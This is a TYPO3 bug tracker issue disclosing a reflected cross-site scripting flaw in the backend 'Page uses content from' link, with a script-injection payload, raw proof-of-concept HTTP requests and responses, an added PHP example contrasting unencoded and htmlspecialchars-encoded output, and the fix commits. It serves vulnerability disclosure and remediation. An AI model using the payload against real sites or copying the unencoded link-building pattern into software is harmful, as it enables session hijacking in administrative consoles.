Bug #82077

XSS in page module

Added by Oliver Hader about 2 years ago. Updated 12 months ago.

Status:
Closed
Priority:
Should have
Assignee:
-
Category:
-
Target version:
-
Start date:
2017-08-10
Due date:
% Done:
100%

TYPO3 Version:
6.2
PHP Version:
Tags:
Complexity:
Is Regression:
Sprint Focus:

Description

For the attention of the TYPO3 security team,

I would like to inform you about a security issue that I have found in the CMS TYPO3 (checked on versions 8.7.3 and 6.2.30).

Specifically, these versions of TYPO3 are vulnerable to a Reflected Cross-Site Scripting in the "Edit Page" area of the Backend administrative console, for pages which are configured to show the content of other pages.

Technical Details
=================
Below is described the scenario to reproduce the security issue.

Prerequisite - Configure a page to show content from another page: in the home Backend administrative console select "Page" from the left panel, then select a site page in the tree view on the side and go to "Edit Page". After that, select the "Appearance" tab and click the "Page" button in the "Replace Content" section in order to add any content to that page, and finally save it.

At this point, in the "Edit Page" area for the aforementioned page, a blue rectangle will appear containing a link with the label "Page uses content from ...", and this link is affected by the reflected XSS issue.

Proof of Concept:
To replicate the issue it is sufficient to click the aforementioned new link (for 8.7.3 it has the format: "/typo3/index.php?M=web_layout&moduleToken=<TOKEN-VALUE>&id=<ID-VALUE>").

Then grab the GET request which is being passed to the server and add the payload to the URL query, so that the submitted payload is reflected in the corresponding response body.

EXAMPLE (a screenshot of the PoC is attached)
Payload: &xss%22%3E%3Cscript%3Ealert(%27xss%27)%3C/script%3E

ORIGINAL REQUEST:
--------------------------------
GET /typo3/index.php?M=web_layout&moduleToken=4b50d8bcec3020fc1f161a4e7c5f4617575c4528&id=2 HTTP/1.1
Host: X.X.X.X
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:54.0) Gecko/20100101 Firefox/54.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Cookie: be_lastLoginProvider=1433416747; be_typo_user=4e3170451d0ce390cece8bca5e06855f
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
If-Modified-Since: Wed, 12 Jul 2017 07:20:31 GMT

PoC REQUEST:
------------
GET /typo3/index.php?M=web_layout&moduleToken=4b50d8bcec3020fc1f161a4e7c5f4617575c4528&id=2&xss%22%3E%3Cscript%3Ealert(%27xss%27)%3C/script%3E HTTP/1.1
Host: X.X.X.X
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:54.0) Gecko/20100101 Firefox/54.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Cookie: be_lastLoginProvider=1433416747; be_typo_user=4e3170451d0ce390cece8bca5e06855f
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1

PoC RESPONSE:
-------------
HTTP/1.1 200 OK
Date: Wed, 12 Jul 2017 08:15:06 GMT
Server: Apache/2.4.18 (Ubuntu)
Expires: 0
Last-Modified: Wed, 12 Jul 2017 08:15:06 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 41399

<!DOCTYPE html>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
[...]
<div class="callout callout-info"><div class="media"><div class="media-left"><span class="fa-stack fa-lg callout-icon"><i class="fa fa-circle fa-stack-2x"></i><i class="fa fa-info fa-stack-1x"></i></span></div><div class="media-body"><h4 class="callout-title">page1</h4><div class="callout-body">
Page uses content from this page: <a href="/typo3/index.php?M=web_layout&moduleToken=4b50d8bcec3020fc1f161a4e7c5f4617575c4528&id=1&xss"><script>alert('xss')</script>=">page1 (PID 1)</a>
</div></div></div></div>
[...]

Vulnerable Versions:
TYPO3 8.7.3 and earlier

Checked on:
TYPO3/8.7.3
TYPO3/6.2.30 (for the 6.2.x versions the affected link is "/typo3/sysext/cms/layout/db_layout.php?id=1&clear_cache=1")
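
Added example (not TYPO3's code and not part of the report above): a minimal PHP stand-in for the "Page uses content from this page" callout link, built first the vulnerable way (link target and label concatenated into the markup unencoded) and then the hardened way, passing every dynamic piece through htmlspecialchars as the fix describes. The function names and the way the module URL is rebuilt from the query parameters are assumptions made for this example; the only input is the query string of the PoC request quoted in the report. Requires PHP 7 or later.

```php
<?php
// Added example, not TYPO3's code: reproduces the shape of the report's callout
// link with a hypothetical link builder, in a vulnerable and a hardened variant.

/**
 * Rebuilds a backend module URL from the current query parameters, overriding
 * 'id' with the page the content is taken from. Assumption for this example:
 * parameter names are emitted as-is and only values are rawurlencode()d, which
 * is what yields the raw `"><script>` seen in the PoC response once PHP has
 * URL-decoded the query string.
 */
function rebuildModuleUrl(string $script, array $params, int $sourcePid): string
{
    $params['id'] = $sourcePid;
    $pairs = [];
    foreach ($params as $name => $value) {
        $pairs[] = $name . '=' . rawurlencode((string)$value);
    }
    return $script . '?' . implode('&', $pairs);
}

/** Vulnerable: neither the URL nor the title is HTML-encoded before output. */
function calloutLinkVulnerable(string $url, string $title, int $pid): string
{
    return 'Page uses content from this page: <a href="' . $url . '">'
        . $title . ' (PID ' . $pid . ')</a>';
}

/** HTML-encodes a string for use in attribute and text context. */
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

/** Hardened: URL and title go through htmlspecialchars, so a double quote
 *  in the query string can no longer terminate the href attribute. */
function calloutLinkSafe(string $url, string $title, int $pid): string
{
    return 'Page uses content from this page: <a href="' . h($url) . '">'
        . h($title) . ' (PID ' . $pid . ')</a>';
}

/** Regression check: true if a raw <script tag survived into the markup. */
function containsRawScriptTag(string $html): bool
{
    return stripos($html, '<script') !== false;
}

// Constructed input: the query string of the PoC request from the report.
$pocQuery = 'M=web_layout&moduleToken=4b50d8bcec3020fc1f161a4e7c5f4617575c4528&id=2'
    . '&xss%22%3E%3Cscript%3Ealert(%27xss%27)%3C/script%3E';
parse_str($pocQuery, $params); // decodes the payload into a parameter *name* with an empty value

$url = rebuildModuleUrl('/typo3/index.php', $params, 1);
$vulnerable = calloutLinkVulnerable($url, 'page1', 1);
$safe = calloutLinkSafe($url, 'page1', 1);

echo $vulnerable, "\n"; // the href attribute is closed by the payload and a <script> tag follows
echo $safe, "\n";       // the same characters stay inside the attribute as entities
var_dump(containsRawScriptTag($vulnerable));
var_dump(containsRawScriptTag($safe));
```

Run with `php example.php`. The vulnerable string carries the decoded `"><script>alert('xss')</script>=` sequence exactly as in the PoC response, so containsRawScriptTag() reports true for it; in the hardened string the same characters appear as `&quot;&gt;&lt;script&gt;` inside the attribute value and the check reports false. Encoding at the output point is the fix; URL-encoding the parameter values alone does not help, because the injected characters live in a parameter name that the URL builder copies through verbatim.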

Associated revisions

Revision 1fa553da (diff)
Added by Wouter Wolters about 2 years ago

[BUGFIX] Prevent XSS in PageLayoutController

Correctly use htmlspecialchars for the link.

Resolves: #82077
Releases: master,8.7,7.6
Change-Id: I87ea4010aa187f5f601c31423fb1a0fc05a23107
Reviewed-on: https://review.typo3.org/53719
Tested-by: TYPO3com <>
Reviewed-by: Wolfgang Klinger <>
Reviewed-by: Frank Naegler <>
Tested-by: Frank Naegler <>
Reviewed-by: Andreas Fernandez <>
Tested-by: Andreas Fernandez <>

Revision 45bdf473 (diff)
Added by Wouter Wolters about 2 years ago

[BUGFIX] Prevent XSS in PageLayoutController

Correctly use htmlspecialchars for the link.

Resolves: #82077
Releases: master,8.7,7.6
Change-Id: I87ea4010aa187f5f601c31423fb1a0fc05a23107
Reviewed-on: https://review.typo3.org/53733
Tested-by: TYPO3com <>
Reviewed-by: Andreas Fernandez <>
Tested-by: Andreas Fernandez <>

Revision 68a17881 (diff)
Added by Wouter Wolters about 2 years ago

[BUGFIX] Prevent XSS in PageLayoutController

Correctly use htmlspecialchars for the link.

Resolves: #82077
Releases: master,8.7,7.6
Change-Id: I87ea4010aa187f5f601c31423fb1a0fc05a23107
Reviewed-on: https://review.typo3.org/53734
Tested-by: TYPO3com <>
Reviewed-by: Andreas Fernandez <>
Tested-by: Andreas Fernandez <>

History

#1 Updated by Oliver Hader about 2 years ago

  • Category set to OW-A07: Cross Site Scripting

#2 Updated by Gerrit Code Review about 2 years ago

  • Status changed from New to Under Review

Patch set 1 for branch master of project Teams/Security/TYPO3v4-Core has been pushed to the review server.
It is available at https://review.typo3.org/53700

#3 Updated by Helmut Hummel about 2 years ago

  • Project changed from Core Security to TYPO3 Core
  • Category deleted (OW-A07: Cross Site Scripting)

This is reflected (non-persistent) XSS, which means that to exploit this you need to trick others into following the link.
However, in this case the link contains a CSRF token, which cannot be known by the attacker.

While this is a valid bug, which needs to be fixed, it is not reasonably exploitable. We can therefore fix this within our public bug fixing process.

#4 Updated by Gerrit Code Review about 2 years ago

Patch set 1 for branch master of project Packages/TYPO3.CMS has been pushed to the review server.
It is available at https://review.typo3.org/53719

#5 Updated by Gerrit Code Review about 2 years ago

Patch set 1 for branch TYPO3_8-7 of project Packages/TYPO3.CMS has been pushed to the review server.
It is available at https://review.typo3.org/53733

#6 Updated by Wouter Wolters about 2 years ago

  • Status changed from Under Review to Resolved
  • % Done changed from 0 to 100

#7 Updated by Gerrit Code Review about 2 years ago

  • Status changed from Resolved to Under Review

Patch set 1 for branch TYPO3_7-6 of project Packages/TYPO3.CMS has been pushed to the review server.
It is available at https://review.typo3.org/53734

#8 Updated by Wouter Wolters about 2 years ago

  • Status changed from Under Review to Resolved

#9 Updated by Benni Mack 12 months ago

  • Status changed from Resolved to Closed
